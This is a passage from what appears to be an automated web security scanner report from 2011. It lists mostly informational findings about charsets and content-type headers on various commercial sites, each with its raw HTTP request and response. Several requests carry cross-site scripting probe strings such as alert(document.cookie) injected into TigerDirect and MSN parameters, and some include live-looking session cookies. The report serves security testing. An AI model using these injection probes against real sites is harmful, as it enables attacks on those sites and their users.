Connection: close
Date: Sun, 30 Jan 2011 01:19:45 GMT

<html><head><title>flash_300x250_HD_PC_promo</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:
...[SNIP]...

32.74. http://vms.redacted/vms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vms.redacted
Path:   /vms.aspx

Request

GET /vms.aspx HTTP/1.1
Host: vms.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Missing mediaid in the querystring
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:51:41 GMT
Content-Length: 11

Bad Request

32.75. http://webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.aol.com
Path:   /$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Request

GET /$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: webmail.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:51:55 GMT
Content-Length: 11

Bad Request

32.76. http://wrapper.g.redacted/GRedirect.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wrapper.g.redacted
Path:   /GRedirect.aspx

Request

GET /GRedirect.aspx HTTP/1.1
Host: wrapper.g.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:52:07 GMT
Connection: close
Content-Length: 11

Bad Request

32.77. http://www.cannex.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cannex.com
Path:   /

Request

GET / HTTP/1.1
Host: www.cannex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:52:10 GMT
Server: Apache
Last-Modified: Fri, 13 Mar 2009 03:35:20 GMT
ETag: "f27-fa5-49b9d478"
Accept-Ranges: bytes
Content-Length: 4005
Connection: close
Content-Type: text/html

<html>

<head>
<title>Welcome to CANNEX Financial Exchanges Limited</title>
<script language="JavaScript">
<!--
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p)
...[SNIP]...

32.78. http://www.co2stats.com/propres.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.co2stats.com
Path:   /propres.php

Request

GET /propres.php?s=1138 HTTP/1.1
Host: www.co2stats.com
Proxy-Connection: keep-alive
Referer: http://news.ycombinator.com/news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:47:32 GMT
Server: Apache/2.2.17
Content-Length: 2967
Content-Type: text/html

var co2stats_width = 0, co2stats_height = 0;
if( typeof( window.innerWidth ) == 'number' ) {
//Non-IE
co2stats_width = window.innerWidth;
co2stats_height = window.innerHeight;
} else if( documen
...[SNIP]...

32.79. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoovers.com
Path:   /business-information/--pageid__13823--/global-mktg-index.xhtml

Request

GET /business-information/--pageid__13823--/global-mktg-index.xhtml HTTP/1.1
Host: www.hoovers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:36 GMT
Server: Apache
Cache-Control: max-age=3600
Expires: Sun, 30 Jan 2011 02:53:36 GMT
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Set-Cookie: HID=173.193.214.243.1296352416131983; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: HID=10.1.1.227.283831296352416137; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: BIGipServerholpriv-colo1=1140916490.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Connection: close
Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/
Content-Length: 18009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Take Th
...[SNIP]...

32.80. http://www.iaventurepartners.com/InformationArbitrage/bcode.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iaventurepartners.com
Path:   /InformationArbitrage/bcode.swf

Request

GET /InformationArbitrage/bcode.swf HTTP/1.1
Host: www.iaventurepartners.com
Proxy-Connection: keep-alive
Referer: http://www.iaventures.com/InformationArbitrage/main.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
cache-control: no-cache
Content-Type: text/html
Content-Length: 65

<html><head><meta http-equiv="refresh" content="0"></head></html>

32.81. http://www.iaventurepartners.com/LKKpQ/InformationArbitrage/bcode.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iaventurepartners.com
Path:   /LKKpQ/InformationArbitrage/bcode.swf

Request

GET /LKKpQ/InformationArbitrage/bcode.swf HTTP/1.1
Host: www.iaventurepartners.com
Proxy-Connection: keep-alive
Referer: http://www.iaventures.com/InformationArbitrage/main.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Pragma: no-cache
cache-control: no-cache
Content-Type: text/html
Content-Length: 65

<html><head><meta http-equiv="refresh" content="0"></head></html>

32.82. http://www.json.org/js.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.json.org
Path:   /js.html

Request

GET /js.html HTTP/1.1
Host: www.json.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:47 GMT
Server: Apache
Last-Modified: Thu, 18 Nov 2010 18:57:56 GMT
ETag: "b3-19a4-4ce57734"
Accept-Ranges: bytes
Content-Length: 6564
Connection: close
Content-Type: text/html

<html>
<head>
<title>JSON in JavaScript</title>
<style>
pre {font-family: "Courier New", Courier, mono; margin-left: 40pt}
</style>
</head>
<body bgcolor=linen>
<table width="100%" border="0">
<tr>

...[SNIP]...

32.83. http://www.json.org/json2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.json.org
Path:   /json2.js

Request

GET /json2.js HTTP/1.1
Host: www.json.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:53:41 GMT
Server: Apache
Content-Length: 401
Connection: close
Content-Type: text/html

<html>
<head>
<title>404 NOT FOUND</title>
</head>

<body bgcolor="linen" text="black">
<div style="font-size: 400px; text-align: center;">404</div>
<div style="font-size: 128px; text-align: center; f
...[SNIP]...

32.84. http://www.microsoft.com/library/errorpages/searchMetric.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /library/errorpages/searchMetric.html

Request

GET /library/errorpages/searchMetric.html?form=MSERRO&q=resources%20ajax%20jQuery%20jquery%201%203%202%20min%20js HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/library/errorpages/searchMetric.html?form=MSERRO&q=resources%20ajax%20jQuery%20jquery%201%203%202%20min%20js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=de6cd851-c13e-496a-b118-22137b8dc5b1&Microsoft.CreationDate=01/30/2011 14:50:57&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.NumberOfVisits=1&SessionCookie.Id=699284D5514B373BB0DF32C40A1FD561; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/30/2011 14:50:57&Microsoft.VisitStartDate=01/30/2011 14:50:57&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=2&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0237-9950-5424-5770; MS0=864ee6b5e2b44b9cadb6502b2d8e8c54; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1296391913882:ss=1296391908891

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/html
Last-Modified: Fri, 13 Jun 2008 16:29:48 GMT
Accept-Ranges: bytes
ETag: "06637b272cdc81:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
VTag: 438166642500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 14:50:57 GMT
Content-Length: 437

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head>
<title>ErrorSearch
...[SNIP]...

32.85. http://www.msnbc.redacted/html/HtmlSitemap0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /html/HtmlSitemap0.html

Request

GET /html/HtmlSitemap0.html HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 19 Nov 2009 18:33:34 GMT
ETag: "013eacc4669ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:11:04 GMT
Content-Length: 107
Connection: close
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted

<html>
<body>
<meta http-equiv="refresh" content="0;url=/html/msnbc/HtmlSitemap0.html">
</body>
</html>

32.86. http://www.spacedaily.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spacedaily.com
Path:   /

Request

GET / HTTP/1.1
Host: www.spacedaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 06:32:40 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Connection: close
Content-Type: text/html
Content-Length: 78931

<HTML><HEAD><TITLE>Space News From SpaceDaily.Com</TITLE>
<META NAME="description" CONTENT="Space News from SpaceDaily.Com brings the space industry professional daily news from the frontier, with con
...[SNIP]...

32.87. http://www.thespacereview.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thespacereview.com
Path:   /

Request

GET / HTTP/1.1
Host: www.thespacereview.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:34 GMT
Server: Apache/1.3.41 Ben-SSL/1.59 (Unix) PHP/4.0.6
Connection: close
Content-Type: text/html
Content-Length: 24875

<html>
<head>
<title>The Space Review: essays and commentary about the final frontier</title>
<link rel="stylesheet" type="text/css" href="/includes/style.css">
</head>

<body bgcolor="#ffffff" topmar
...[SNIP]...

32.88. http://www.tigerdirect.com/cgi-bin/icart.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /cgi-bin/icart.asp

Request

GET /cgi-bin/icart.asp HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; SRVR=WEBX10%2D07A; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SRCCODE=WEB1101; SSLB=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 29 Jan 2011 15:14:42 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:14:42 GMT
Connection: close
Set-Cookie: SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
Set-Cookie: SRVR=WEBX12%2D06B; path=/
Content-Length: 1476


<HTML>
<HEAD>
<TITLE>Your TigerDirect.com Shopping Cart</TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Keywords" CONTENT="">
<META NAME="Descrip
...[SNIP]...

32.89. http://www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webmd.com
Path:   /$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Request

GET /$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Sun, 30 Jan 2011 02:04:07 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

33. HTML uses unrecognised charset
There are 3 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


33.1. http://ccc01.opinionlab.com/o.asp

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://ccc01.opinionlab.com
Path:   /o.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /o.asp?id=swHtlTXj HTTP/1.1
Host: ccc01.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14859
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCQTCBBDR=KLBDJLOBBPPOPIONDAELIJLO; path=/
Date: Sat, 29 Jan 2011 23:45:32 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<title>Comment Card</title><script language="javascript" type="tex
...[SNIP]...

33.2. https://secure.opinionlab.com/ccc01/comment_card.asp

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:21:59 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

33.3. https://secure.opinionlab.com/ccc01/o.asp

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://secure.opinionlab.com
Path:   /ccc01/o.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /ccc01/o.asp?ID=WpkpVtTB HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17222
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:40 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS: 1 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment
...[SNIP]...

34. Content type incorrectly stated
There are 123 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


34.1. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test_cookie=CheckForPermission;

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sat, 29 Jan 2011 23:45:09 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

34.2. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 01:28:06 GMT; path=/
Set-Cookie: i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; expires=Tue, 01-Mar-2011 01:28:06 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2438

   function wsod_flash() {
       document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="300" height="250" id="W_8_45_5" align="middle">');
       document.write('<param name="salign"
...[SNIP]...

34.3. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number?click=Insert_Click_Track_URL HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:28:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1499

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 13:00:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

34.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**

Issue detail

The response contains the following Content-type statement:

